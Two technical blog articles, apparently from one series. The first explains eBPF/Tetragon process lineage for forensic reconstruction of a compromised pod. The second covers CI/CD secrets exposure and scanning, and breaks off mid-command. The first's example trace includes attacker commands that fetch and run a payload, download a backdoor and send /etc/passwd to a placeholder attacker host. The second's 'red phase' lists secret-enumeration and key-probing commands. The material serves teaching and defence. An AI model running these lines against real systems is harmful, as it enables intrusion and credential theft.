Not running Tetragon? Plain bpftrace on the node gives you the same raw data without Kubernetes enrichment — you get PIDs and process names but not pod names or namespaces without the /proc/<pid>/cgroup mapping step. For incident reconstruction, the Tetragon-enriched stream is significantly more useful because pod attribution is baked in at capture time, not reconstructed afterward.
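The /proc/<pid>/cgroup mapping step is mostly string parsing. A sketch, assuming the two common kubelet cgroup layouts: cgroupfs-driver paths such as /kubepods/burstable/pod<uid>/<container-id>, and systemd-driver paths such as kubepods-burstable-pod<uid>.slice, where the dashes in the UID become underscores. The function names are illustrative, and turning the UID into a pod name still needs the Kubernetes API (for example, matching .metadata.uid in kubectl get pods -A -o json).

```python
import re
from typing import Optional

# cgroupfs driver: .../pod3f8a21bc-1c2d-4e5f-8a9b-0c1d2e3f4a5b/<container-id>
# systemd driver:  ...-pod3f8a21bc_1c2d_4e5f_8a9b_0c1d2e3f4a5b.slice/...
POD_UID_RE = re.compile(
    r"pod([0-9a-f]{8}[-_][0-9a-f]{4}[-_][0-9a-f]{4}[-_][0-9a-f]{4}[-_][0-9a-f]{12})"
)


def pod_uid_from_cgroup(cgroup_text: str) -> Optional[str]:
    """Return the pod UID embedded in /proc/<pid>/cgroup contents, or None."""
    for line in cgroup_text.splitlines():
        # Each line is hierarchy-ID:controllers:path (cgroup v2 has a single "0::" line).
        path = line.split(":", 2)[-1]
        match = POD_UID_RE.search(path)
        if match:
            return match.group(1).replace("_", "-")
    return None


def pod_uid_for_pid(pid: int) -> Optional[str]:
    """Read /proc/<pid>/cgroup on the node and extract the pod UID."""
    with open(f"/proc/{pid}/cgroup") as f:
        return pod_uid_from_cgroup(f.read())
```

Host processes (sshd, kubelet) have no pod segment in their cgroup path, so they come back as None rather than being misattributed.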


A container in the payments namespace was reported compromised. The security team’s automated response had already restarted the pod — the attacker’s process was gone. The container’s filesystem had been reset to the image. The application logs for that pod were deleted when the pod restarted. The Kubernetes event log showed the pod restart but nothing about what had run inside it.

Three questions, no answers yet:
1. What spawned the attacker’s process? (was it a remote code execution in the app, or a misconfigured exec?)
2. What did the attacker run after getting in? (what did they download, execute, touch?)
3. What network connections did they make? (where did data go, if anywhere?)

The answers were in Tetragon’s process event export — captured at the kernel level before the pod was restarted, stored in the observability backend, and queryable by pod name and time window. The kernel had seen every exec, every fork, every file open. The restart didn’t touch that record.

The lineage showed:

my-app (PID 18201)
  └── sh -c "curl http://attacker.com/payload.sh | sh"  (PID 18293)
        └── sh payload.sh  (PID 18294)
              ├── cat /etc/passwd  (PID 18295)
              ├── curl http://attacker.com/exfil -d @/etc/passwd  (PID 18296)
              └── wget -O /tmp/.x http://attacker.com/backdoor  (PID 18297)
                    └── chmod +x /tmp/.x  (PID 18298)

Five minutes of attacker activity, fully reconstructed, from a pod that no longer existed.


How the Kernel Tracks Process Identity

Every process in Linux is represented by a task_struct — the kernel’s internal data structure for a running process. It contains everything the kernel knows about that process.

task_struct: the kernel’s primary data structure for a process. It holds, directly or through pointers: the PID and thread-group ID (pid, tgid), credentials including UID and GID (via cred), the process name (comm, at most 15 characters), open file descriptors, memory mappings, namespace references, cgroup membership, capabilities, and real_parent, a pointer to the parent’s task_struct. When bpftrace uses curtask, it returns a pointer to the current process’s task_struct. Reading curtask->real_parent->tgid gives you the parent’s PID, the foundation of process lineage.

When a process calls fork(), the kernel:
1. Allocates a new task_struct for the child
2. Copies the parent’s task_struct fields into the child
3. Sets the child’s real_parent pointer to the parent’s task_struct
4. Assigns the child a new PID
5. Returns the child’s PID to the parent, and 0 to the child

When the child calls execve(), the kernel:
1. Validates the binary (file permission and binary-format checks, LSM hooks)
2. Replaces the process’s memory image with the new binary
3. Updates task_struct->comm with the new process name
4. The PID does not change — execve replaces the process image but not the process identity

This fork-then-exec sequence is how every shell command works: the shell forks a child, and the child execs the command. eBPF hooks on both events, correlated by PID and parent PID, give you the complete tree.
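The claim that execve keeps the PID is easy to check from userspace. A minimal Linux-only Python sketch, assuming sh is on PATH (the function name is illustrative): the parent learns the child's PID from fork()'s return value, the child then execs sh, and sh prints its own PID via $$. The two numbers match, which is why a fork event and the exec that follows it can be joined on PID.

```python
import os


def fork_then_exec_pids() -> tuple:
    """Return (PID the parent saw from fork(), PID reported after execve)."""
    read_fd, write_fd = os.pipe()
    child_pid = os.fork()  # parent receives the child's PID; child receives 0
    if child_pid == 0:
        # Child: send stdout into the pipe, then replace the process image.
        os.close(read_fd)
        os.dup2(write_fd, 1)
        os.close(write_fd)
        try:
            # $$ expands to the shell's PID, i.e. this same process after execve.
            os.execvp("sh", ["sh", "-c", "echo $$"])
        finally:
            os._exit(127)  # reached only if execvp failed
    os.close(write_fd)
    with os.fdopen(read_fd) as pipe:
        pid_after_exec = int(pipe.read().strip())
    os.waitpid(child_pid, 0)
    return child_pid, pid_after_exec
```

Calling fork_then_exec_pids() returns two identical numbers, both different from the caller's own os.getpid().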


Building the Process Tree with Tracepoints

The two core hooks for process lineage:

# Every fork: capture the parent/child relationship
# (threads created with clone() also appear; on kernels with clone3, attach
#  tracepoint:syscalls:sys_exit_clone3 as well)
bpftrace -e '
tracepoint:syscalls:sys_exit_clone {
    // args->ret is the child PID, as seen from the parent
    if (args->ret > 0) {
        printf("FORK parent=%-6d child=%-6d parent_comm=%-20s\n",
               pid, args->ret, comm);
    }
}'
# Every exec: capture which binary replaced the process image, plus the full argv
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("EXEC pid=%-6d ppid=%-6d binary=%-40s args=",
           pid,
           curtask->real_parent->tgid,
           str(args->filename));
    join(args->argv);
}'

Combined output (30 seconds, simplified):

FORK parent=18201 child=18293  parent_comm=my-app
EXEC pid=18293 ppid=18201 binary=/bin/sh              args=sh -c curl http://...
FORK parent=18293 child=18294  parent_comm=sh
EXEC pid=18294 ppid=18293 binary=/bin/sh              args=sh payload.sh
FORK parent=18294 child=18295  parent_comm=sh
EXEC pid=18295 ppid=18294 binary=/bin/cat             args=cat /etc/passwd
FORK parent=18294 child=18296  parent_comm=sh
EXEC pid=18296 ppid=18294 binary=/usr/bin/curl        args=curl http://attacker.com/exfil -d @/etc/passwd

Each line is a kernel event. The parent/child PID chain is the tree. Rendered:

my-app (18201)
  └── sh (18293) — "sh -c curl http://attacker.com/payload.sh | sh"
        └── sh (18294) — "sh payload.sh"
              ├── cat (18295) — "/etc/passwd"
              └── curl (18296) — "http://attacker.com/exfil -d @/etc/passwd"

This tree is constructed entirely from kernel events. No application logging. No container stdout. No agent inside the container.
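Rendering the tree from those FORK and EXEC lines takes only a parent map and a depth-first walk. A minimal Python sketch, assuming the exact line formats printed by the two bpftrace programs above; it keeps the last EXEC seen per PID as that process's label and ignores PID reuse (see the gotcha on that below), so treat it as a starting point rather than a forensic tool.

```python
import re
from collections import defaultdict

# Line formats printed by the two bpftrace programs above.
FORK_RE = re.compile(r"FORK parent=(\d+)\s+child=(\d+)\s+parent_comm=(\S+)")
EXEC_RE = re.compile(r"EXEC pid=(\d+)\s+ppid=(\d+)\s+binary=(\S+)\s+args=(.*)")


def build_tree(lines):
    """Return (roots, children, label) built from FORK/EXEC trace lines."""
    parent_of, label = {}, {}
    for line in lines:
        if m := FORK_RE.search(line):
            parent, child = int(m[1]), int(m[2])
            parent_of[child] = parent
            # A process we only ever saw forking keeps its comm as its label.
            label.setdefault(parent, f"{m[3]} ({parent})")
        elif m := EXEC_RE.search(line):
            pid, ppid = int(m[1]), int(m[2])
            parent_of.setdefault(pid, ppid)
            name = m[3].rsplit("/", 1)[-1]
            label[pid] = f'{name} ({pid}) "{m[4].strip()}"'
    children = defaultdict(list)
    for child, parent in parent_of.items():
        children[parent].append(child)
    roots = sorted(p for p in children if p not in parent_of)
    return roots, children, label


def render(pid, children, label, depth=0):
    """Yield one indented line per process, depth-first."""
    prefix = "  " * depth + ("└── " if depth else "")
    yield prefix + label.get(pid, f"? ({pid})")
    for child in sorted(children.get(pid, [])):
        yield from render(child, children, label, depth + 1)
```

Pipe both bpftrace outputs into one file, pass its lines to build_tree(), then print every line of render(root, children, label) for each root.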


How Tetragon Stores the Process Tree in BPF Maps

bpftrace’s approach above produces an event stream — a log you reconstruct manually. Tetragon takes a different approach: it maintains a live process tree in BPF maps, updated on every fork and exec event, persistently queryable.

Kernel events (kprobe on clone, execve, exit)
      ↓
Tetragon eBPF programs
      ↓
Write to BPF_MAP_TYPE_HASH: process_cache
      key: PID
      value: {binary, args, start_time, parent_pid, pod_name, namespace, uid, gid, caps}
      ↓
Tetragon userspace agent
      reads process_cache on events
      enriches with Kubernetes pod metadata (from informer cache)
      exports to gRPC stream → observability backend

task_struct in BPF maps — Tetragon doesn’t store the raw task_struct pointer in its maps (pointers are not stable across process lifetime). Instead, it stores a snapshot of the relevant fields (PID, binary path, arguments, capabilities, cgroup path, start time) at the moment of the exec event, keyed by PID. When the process exits, the entry is kept in the cache for a configurable window to allow late-arriving events (like file closes or connection terminations) to be correlated back to the originating process.
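The snapshot-and-retain behaviour described above, together with the PID reuse problem covered in the gotchas, can be modelled in a few lines. This is a hypothetical userspace model, not Tetragon's actual data structure: entries are keyed by (PID, start time), a lookup returns the process that owned a PID at a given moment, and exited entries linger for a retention window so late events still resolve.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass
class ProcInfo:
    pid: int
    start_ns: int
    binary: str
    ppid: int
    exit_ns: Optional[int] = None


class ProcessCache:
    """Hypothetical cache keyed by (pid, start_ns), so a reused PID never aliases."""

    def __init__(self, retention_ns: int):
        self.retention_ns = retention_ns
        self.entries: Dict[Tuple[int, int], ProcInfo] = {}

    def on_exec(self, pid: int, start_ns: int, binary: str, ppid: int) -> None:
        # Snapshot the fields at exec time; nothing points back at live kernel state.
        self.entries[(pid, start_ns)] = ProcInfo(pid, start_ns, binary, ppid)

    def on_exit(self, pid: int, exit_ns: int) -> None:
        # Mark the exit but keep the entry so late events can still be attributed.
        info = self.lookup(pid, exit_ns)
        if info is not None:
            info.exit_ns = exit_ns

    def lookup(self, pid: int, at_ns: int) -> Optional[ProcInfo]:
        """Return the process that owned `pid` at time `at_ns` (linear scan for brevity)."""
        best = None
        for (p, start), info in self.entries.items():
            alive_then = start <= at_ns and (info.exit_ns is None or at_ns <= info.exit_ns)
            if p == pid and alive_then and (best is None or start > best.start_ns):
                best = info
        return best

    def expire(self, now_ns: int) -> None:
        """Drop entries whose process exited more than retention_ns ago."""
        self.entries = {
            key: info for key, info in self.entries.items()
            if info.exit_ns is None or now_ns - info.exit_ns <= self.retention_ns
        }
```

Keying on PID alone would let the second owner of a PID overwrite the first; the start-time component is what keeps the attacker's curl and a later, unrelated process apart.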

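To inspect Tetragon’s process cache directly (map names vary between Tetragon versions; Tetragon’s source calls its PID-keyed process map execve_map, so adjust the grep to whatever bpftool map list shows):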

# Find the Tetragon process cache map
bpftool map list | grep process_cache

# 112: hash  name process_cache  flags 0x0
#      key 4B  value 256B  max_entries 65536  memlock 16777216B

# Dump a few entries
bpftool -p map dump id 112 | head -60

# [{
#     "key": 18293,                           # ← PID
#     "value": {
#         "binary": "/bin/sh",
#         "args": "sh -c curl http://...",
#         "pid": 18293,
#         "ppid": 18201,
#         "uid": 1000,
#         "start_time": 1745296443,
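#         "cgroup": "kubepods/burstable/pod3f8a21bc/..."
#     }
# }]

The cgroup field identifies the pod (by pod UID) and the container: it is the same path as /proc/<pid>/cgroup, captured at exec time and stored in kernel space. The path carries no namespace or pod name; those come from Kubernetes metadata, which the Tetragon agent adds from its informer cache.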


Correlating Files and Connections to the Process Tree

Process lineage is most useful when combined with the file access and network connection events from the same process. Tetragon’s TracingPolicy supports this multi-event correlation natively:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-process-lineage
spec:
  kprobes:
    - call: "security_inode_permission"
      syscall: false
      args:
        - index: 0
          type: "inode"
      selectors:
        - matchNamespaces:
            - namespace: Net
              operator: "NotIn"
              values: ["host_ns"]    # exclude the host network namespace
          matchActions:
            - action: Post   # audit: log but don't block
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchActions:
            - action: Post

With this policy active, Tetragon emits events for both file access and TCP connections, each carrying the full process context (PID, binary, pod, parent). Correlated by PID and timestamp:

tetra getevents | jq 'select(.process_kprobe.function_name == "tcp_connect") |
  {pid: .process_kprobe.process.pid,
   binary: .process_kprobe.process.binary,
   pod: .process_kprobe.process.pod.name,
   dst: .process_kprobe.args[0].sock_arg.daddr}'

Sample output:

{"pid": 18296, "binary": "/usr/bin/curl", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}
{"pid": 18297, "binary": "/usr/bin/wget", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}

PIDs 18296 and 18297 both connected to the same IP. Cross-reference with the process tree: those are the curl and wget spawned by the attacker’s payload script. The destination IP is the attacker’s infrastructure. The timeline is precise to well under a millisecond because the kernel timestamps each event at the hook point.
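The cross-reference step can be automated by walking each connecting process up its parent chain, so the output reads as a lineage rather than a bare PID. A sketch, assuming a PID-to-(binary, parent PID) map already built from exec events and (pid, destination) pairs taken from the jq output above; PID reuse is ignored, and the visited set only guards against loops.

```python
from typing import Dict, Iterable, Iterator, List, Tuple


def ancestry(pid: int, procs: Dict[int, Tuple[str, int]]) -> List[str]:
    """Binary names from `pid` up to the oldest known ancestor."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)  # guard against cycles caused by PID reuse
        binary, ppid = procs[pid]
        chain.append(f"{binary.rsplit('/', 1)[-1]}({pid})")
        pid = ppid
    return chain


def attribute_connections(connects: Iterable[Tuple[int, str]],
                          procs: Dict[int, Tuple[str, int]]) -> Iterator[str]:
    """Yield 'dst <- curl(18296) <- sh(18294) <- ...' for each (pid, dst) pair."""
    for pid, dst in connects:
        yield f"{dst} <- " + " <- ".join(ancestry(pid, procs))
```

Run against the incident data, both connections resolve back through the payload shell to my-app, which is the attribution the investigation needed.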


Building Process Lineage Without Tetragon

If you’re not running Tetragon, you can build a basic process lineage recorder with bpftrace that writes to a file:

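# Record exec and exit events to a node-local file; run in the background on the node.
# nsecs is nanoseconds since boot (monotonic), so it orders events but is not wall-clock time.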
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%llu EXEC pid=%-6d ppid=%-6d binary=%s\n",
           nsecs, pid, curtask->real_parent->tgid, str(args->filename));
}
tracepoint:sched:sched_process_exit {
    printf("%llu EXIT pid=%-6d comm=%s\n", nsecs, pid, comm);
}
' > /var/log/process-lineage.log &

# Tail the log for real-time observation
tail -f /var/log/process-lineage.log

Sample output:

1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh

This file survives pod restarts because it’s on the node, not in the container. After the pod is restarted, the process lineage record is still on disk. You reconstruct the tree by grouping by ppid and ordering by timestamp.


⚠ Production Gotchas

Ringbuf saturation on high-process-churn nodes. Nodes running serverless workloads or short-lived batch jobs may spawn thousands of processes per minute. Hooking exec on every process at that rate generates a high ringbuf write volume. Filter at the eBPF level by cgroup (namespace) rather than in userspace — sending events to userspace only to discard them wastes ringbuf space and CPU. Tetragon’s namespace selector does this filtering in the eBPF program before the write.

The 15-character comm truncation. The comm field in task_struct is limited to 15 characters (plus null terminator). Process names longer than 15 characters are truncated. bpftrace’s comm built-in has the same limit. For the full binary path, read from execve’s filename argument at the tracepoint, not from comm.
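The truncation is visible from userspace too: on exec, the kernel sets comm from the basename of the path passed to execve and cuts it to 15 characters. A Linux-only Python sketch, assuming a sleep binary on PATH; it runs sleep through a symlink with a long name and reads the resulting comm from /proc.

```python
import os
import shutil
import subprocess
import tempfile


def comm_after_exec(long_name: str) -> str:
    """Exec `sleep` under `long_name` and return the kernel's comm for it."""
    sleep_bin = shutil.which("sleep")
    if sleep_bin is None:
        raise RuntimeError("this sketch needs a 'sleep' binary on PATH")
    with tempfile.TemporaryDirectory() as tmp:
        link = os.path.join(tmp, long_name)
        os.symlink(sleep_bin, link)
        # comm is taken from the basename of the path handed to execve.
        proc = subprocess.Popen([link, "5"])
        try:
            with open(f"/proc/{proc.pid}/comm") as f:
                return f.read().rstrip("\n")
        finally:
            proc.kill()
            proc.wait()
```

comm_after_exec("process-lineage-recorder") comes back as "process-lineage", while the execve filename argument still carries the full path.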

PID reuse. Linux PIDs are reused after a process exits. In a high-churn environment, a PID you recorded as an attacker process may be reassigned to a legitimate process seconds later. Always pair PIDs with start time and cgroup path when correlating across events. Tetragon’s process cache keys on PID + start time to handle this.

Exec chains lose argument history. When execve replaces the process image, task_struct->comm changes but the PID does not. If the attacker’s shell runs exec bash to replace itself with a less suspicious binary name, the exec event captures the new binary — but the PID lineage still shows the parent correctly. Don’t rely on comm alone for process identity; always track the binary path from the exec event.

Process events don’t capture file content. You see that /bin/cat /etc/passwd ran. You don’t see what was in /etc/passwd at that moment unless you also capture file open/read events. Tetragon’s security_inode_permission hook tells you which files were accessed; capturing their content requires additional hooks on vfs_read with buffer capture, which is significantly higher overhead and requires careful data handling for sensitive files.


Quick Reference

What you want: command
Live exec trace (bpftrace): bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf(...) }'
Fork + exec tree: combine sys_exit_clone and sys_enter_execve traces, correlate by pid/ppid
Tetragon process events: tetra getevents --event-types PROCESS_EXEC
Tetragon file + network events: tetra getevents --event-types PROCESS_KPROBE
Process cache map: bpftool map list | grep process_cache, then bpftool map dump id N
Map PID to pod: cat /proc/<pid>/cgroup → extract pod UID
Process exit events: tracepoint:sched:sched_process_exit

Process event: kernel hook
New process spawned: tracepoint:syscalls:sys_exit_clone (args->ret > 0 is the child PID)
Binary executed: tracepoint:syscalls:sys_enter_execve
Process exited: tracepoint:sched:sched_process_exit
File opened: tracepoint:syscalls:sys_enter_openat
Network connect: kprobe:tcp_connect
DNS query: tracepoint:syscalls:sys_enter_sendto (port 53)

Key Takeaways

  • Process lineage with eBPF hooks fork and exec at the kernel level — every process spawned on a node is recorded with its parent PID, binary path, arguments, and container context, regardless of what the container does to suppress application logs
  • The kernel’s task_struct is the authoritative source of process identity; eBPF programs read it at hook time and snapshot the relevant fields into BPF maps before the process can exit or be killed
  • Tetragon maintains a live process tree in BPF maps, correlates it with Kubernetes metadata, and makes it queryable by pod/namespace — the record persists after the pod is restarted
  • Incident reconstruction requires joining process lineage with file access and network connection events by PID and timestamp; eBPF provides all three event streams from the same kernel attachment mechanism
  • PID reuse is a real concern in high-churn environments; always pair PIDs with start time and cgroup path when correlating across events
  • Kernel-level process events cannot be suppressed by a compromised container process: an attacker with root inside the container still cannot stop bpftrace or Tetragon running on the host from recording their syscalls, unless they first escape to the node

What’s Next

EP14 is the payoff episode for the entire series arc so far. You’ve seen programs load (EP04), maps hold state (EP05), CO-RE keep programs portable (EP06), XDP and TC enforce at the network layer (EP07, EP08), bpftrace ask one-off questions (EP09), the observability stack collect flow and DNS data continuously (EP10, EP11), LSM hooks and Tetragon enforce at the syscall boundary (EP12), and process lineage reconstruct what happened after the fact (EP13).

EP14 synthesises all of it into four commands that tell you everything about any cluster you’ve never seen before — any eBPF-based tool, any vendor, any configuration. The audit playbook is what you run in the first 10 minutes when you inherit a cluster and need to understand what’s enforcing policy at the kernel level before you can trust anything it tells you.

Next: the audit playbook — four commands to see any cluster

Get EP14 in your inbox when it publishes → linuxcent.com/subscribe

CI/CD Secrets Exposure: How Supply Chain Attacks Target Your Pipeline

Reading Time: 11 minutes



TL;DR

  • CI/CD secrets exposure is OWASP A08 + A02: credentials committed to repositories or stored in pipeline environment variables can be exfiltrated when the platform is compromised, and automated scanners find them within seconds of a public commit
  • The CircleCI breach (January 2023): an engineer’s laptop was compromised via malware → session token stolen → attacker accessed CircleCI production systems → all customer environment variables (AWS keys, GitHub tokens, SSH keys) exfiltrated
  • The structural problem: long-lived credentials stored in a CI/CD platform are only as secure as the platform itself — if the platform is compromised, all stored secrets are compromised
  • The structural fix: OIDC workload identity replaces stored credentials with short-lived tokens issued at job runtime — there is nothing to exfiltrate
  • Pre-commit hooks and CI-layer secret scanning are detection layers, not structural fixes — they catch accidents, not determined attackers
  • Automated secret scanners (TruffleHog, Gitleaks) find credentials in public repos within 60–90 seconds of commit

OWASP Mapping: A08 Software and Data Integrity Failures — build pipeline integrity. A02 Cryptographic Failures — secrets stored in ways that allow exfiltration.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│                  CI/CD SECRETS ATTACK SURFACE                       │
│                                                                     │
│   VECTOR 1: COMMITTED TO VCS                                        │
│   Developer ── git commit ──▶ .env with AWS_SECRET_KEY              │
│   Automated scanner ──────▶  clones within 60 seconds              │
│   Attacker ───────────────▶  accesses AWS before dev notices        │
│                                                                     │
│   VECTOR 2: STORED IN CI/CD PLATFORM                                │
│   DevOps ─── configures ──▶  AWS_ACCESS_KEY_ID in CircleCI         │
│   Attacker compromises CircleCI → exfiltrates all org env vars      │
│                                                                     │
│   VECTOR 3: IN CONTAINER/PROCESS ENV                                │
│   kubectl exec / docker inspect ──▶  printenv shows credentials     │
│   Anyone with container exec access = credential access             │
│                                                                     │
│   VECTOR 4: IN BUILD ARTIFACTS / LOGS                               │
│   Build log: "Using token: ghp_xxxxxxxxxxxx..." → exposed in log   │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│   STRUCTURAL FIX: OIDC WORKLOAD IDENTITY                            │
│   No stored credential → nothing to commit, nothing to exfiltrate  │
│   CI job requests token at runtime → 1-hour TTL → expired          │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

CI/CD secrets exposure is not primarily a developer discipline problem; it is a structural problem. When credentials are stored in a CI/CD platform, in environment variables, or in version control, the only question is when they will be exposed, not whether. The structural answer replaces stored credentials with dynamically issued, short-lived tokens: nothing long-lived is stored, so there is nothing durable to exfiltrate, and a stolen token expires on its own.


The 25-Minute Compromise: How Automated Scanning Works Against You

At 2:47 AM, a developer committed a .env file to a public GitHub repository. It contained:

DATABASE_URL=postgres://admin:<password>@<db-host>:5432/customers
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
STRIPE_SECRET_KEY=sk_live_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

At 2:48 AM — 60 seconds later — an automated scanner had cloned the repository. These scanners run continuously against GitHub’s public event stream, looking for credential patterns in new commits, new files, and new repository forks.

At 3:12 AM — 25 minutes after the commit — the database started receiving unusual queries. The automated scanning infrastructure is not operated by individuals manually watching for leaks. It is fully automated: pattern match → clone → test credential validity → if valid, begin exploitation or sell.

GitHub now runs its own secret scanning on public repositories: it revokes leaked GitHub tokens and notifies partnered providers such as AWS, which then act on their own credentials (AWS, for example, attaches a restrictive quarantine policy to the exposed key and notifies the account owner). This covers a subset of credential types. It does not cover database passwords, service-specific tokens for non-partnered services, or private repository commits that become public via fork.
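The "pattern match" stage of that pipeline is ordinary regular-expression scanning. A minimal Python sketch, assuming two well-known formats: AWS access key IDs (AKIA for long-lived keys, ASIA for temporary ones, followed by 16 uppercase letters or digits) and classic GitHub personal access tokens (ghp_ followed by 36 alphanumerics). Real scanners such as TruffleHog and Gitleaks ship far more detectors and then test whether a match is live; this shows only the first step.

```python
import re

DETECTORS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_classic_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
}


def scan_text(text: str):
    """Yield (line_number, detector, match) for every candidate secret."""
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in DETECTORS.items():
            for match in pattern.finditer(line):
                yield lineno, name, match.group(0)
```

Run over the .env file above, it flags the AWS key ID on its first pass; the database URL and Stripe key need detectors of their own, which is exactly the coverage gap described in this section.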


The CircleCI Breach: Platform-Level Credential Exfiltration

The CircleCI breach (January 2023) is the definitive example of CI/CD platform-level secrets exposure. The attack chain:

1. CircleCI engineer's laptop compromised via malware (initial vector not fully disclosed)
2. Malware steals a 2FA-authenticated SSO session token
3. Session token valid, not expired
4. Attacker uses session token to authenticate to CircleCI internal systems
5. From internal access, attacker reaches production database
6. Production database contains encrypted customer secrets (environment variables)
7. Encryption keys also reachable (CircleCI reported the attacker extracted them from a running process)
8. Attacker exfiltrates: encrypted secrets + encryption keys = plaintext secrets

What was stored in CircleCI environment variables by customers:
– AWS IAM access key ID and secret access key pairs
– GitHub personal access tokens and OAuth tokens
– DockerHub credentials
– SSH private keys (for deployment access)
– Heroku API keys
– Stripe, Twilio, SendGrid API keys
– Internal service account credentials

CircleCI could not determine which customer secrets were accessed and which were not — they notified all customers to rotate all credentials stored in their system.

The scale of the blast radius: any customer who had stored long-lived credentials in CircleCI environment variables was potentially compromised, and those credentials stayed valid until the customer rotated them. The CircleCI platform’s encryption only protected against offline attacks: an attacker with internal database access and access to the encryption keys had everything needed to decrypt.


Red Phase: Enumerating Secrets Exposure in Your Pipeline

Scanning Repositories for Committed Secrets

# Install TruffleHog (a Go binary, e.g. brew install trufflehog) or use the Docker image
docker run --rm \
  -v "$(pwd):/repo" \
  trufflesecurity/trufflehog:latest \
  git file:///repo \
  --json \
  --only-verified \
  2>/dev/null | \
  jq '{
    file: .SourceMetadata.Data.Git.file,
    commit: .SourceMetadata.Data.Git.commit,
    detector: .DetectorName,
    verified: .Verified,
    line: .SourceMetadata.Data.Git.line
  }'
# Gitleaks: alternative scanner with SARIF output for CI integration
gitleaks detect \
  --source . \
  --report-format sarif \
  --report-path gitleaks-report.sarif \
  --verbose

# Or: scan every branch and ref, not only the current branch's history
# (catches secrets committed elsewhere and later deleted)
gitleaks detect \
  --source . \
  --log-opts="--all" \
  --report-format json \
  --report-path gitleaks-history.json
# Scan a specific GitHub organization's public repositories
# (test your own org before red team exercises)
trufflehog github \
  --org your-github-org \
  --token "${GITHUB_TOKEN}" \
  --json \
  --only-verified \
  2>/dev/null | \
  jq '{
    repo: .SourceMetadata.Data.Github.repository,
    file: .SourceMetadata.Data.Github.file,
    detector: .DetectorName,
    verified: .Verified
  }'
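Both scanners start from pattern matching. A minimal sketch of that first step, assuming the well-known shape of AWS access key IDs ("AKIA" for long-term IAM user keys, "ASIA" for temporary STS keys, then 16 uppercase letters or digits); `find_aws_key_ids` is a hypothetical helper, and real detectors are far broader and add the live verification that `--only-verified` relies on:

```bash
#!/usr/bin/env bash
# Sketch only: flag strings shaped like AWS access key IDs.
# Assumed shape: "AKIA" (long-term IAM user key) or "ASIA" (temporary STS key)
# followed by 16 uppercase letters or digits, 20 characters in total.
find_aws_key_ids() {
  # Reads text on stdin and prints each candidate key ID on its own line.
  # "|| true" keeps the exit status 0 when nothing matches.
  grep -oE '\b(AKIA|ASIA)[A-Z0-9]{16}\b' || true
}

printf 'aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n' | find_aws_key_ids
# prints AKIAIOSFODNN7EXAMPLE
```

For staged changes, `git diff --cached | find_aws_key_ids` runs the same check. A hit only says the string looks like a key ID; whether the key is live is the question verification answers.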

Enumerating Secrets in CI/CD Platform Environment Variables

# GitHub Actions: list secrets defined in a repository
# (shows names only — values are not returned by API, but names reveal what's stored)
curl -H "Authorization: Bearer ${GITHUB_TOKEN}" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/repos/your-org/your-repo/actions/secrets" | \
  jq '.secrets[] | {name: .name, updated: .updated_at}'

# GitHub Actions: list organization-level secrets
curl -H "Authorization: Bearer ${GITHUB_TOKEN}" \
  -H "Accept: application/vnd.github+json" \
  "https://api.github.com/orgs/your-org/actions/secrets" | \
  jq '.secrets[] | {name: .name, visibility: .visibility, updated: .updated_at}'

# Check for credential-like env var names in running pods (Kubernetes)
# Any identity that can list pods cluster-wide, an attacker included, can run this
kubectl get pods -A -o json | \
  jq -r '.items[] | 
    .metadata.namespace + "/" + .metadata.name + ": " + 
    ([.spec.containers[].env[]? | 
      select(.name | test("KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL|API"; "i")) |
      .name
    ] | join(", "))' | \
  grep -v ": $"  # Only show pods with matching env var names
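The jq filter matches env var names with an unanchored, case-insensitive regex. A small sketch of the same test in plain bash (`looks_like_secret_name` is a hypothetical helper) shows the trade-off: unanchored matching catches every real secret name, but also names that merely contain one of the words, such as MONKEY_COUNT (KEY) or RAPID_MODE (API):

```bash
#!/usr/bin/env bash
# Sketch: the same unanchored, case-insensitive name test as the jq filter,
# applied to one env var name at a time.
looks_like_secret_name() {
  if printf '%s\n' "$1" | grep -qiE 'KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL|API'; then
    echo "match"
  else
    echo "no-match"
  fi
}

# Real secrets match, but so do names that merely contain KEY or API.
for name in AWS_SECRET_ACCESS_KEY DB_PASSWORD MONKEY_COUNT RAPID_MODE LOG_LEVEL; do
  printf '%-22s %s\n' "$name" "$(looks_like_secret_name "$name")"
done
```

Expect some noise from this kind of filter; it narrows the search, and a human still reads the matching names.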

Testing Whether AWS Keys in CI/CD Are Over-Permissioned

# If you find an AWS access key in a scan — test its permissions
# (on your own test account's keys only)
aws sts get-caller-identity
# Returns: account, user/role ARN, caller ID

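# What can this key do? Needs iam:SimulatePrincipalPolicy, and only accepts IAM user,
# group or role ARNs (convert an assumed-role session ARN to its role ARN first)
aws iam simulate-principal-policy \
  --policy-source-arn "$(aws sts get-caller-identity --query Arn --output text)" \
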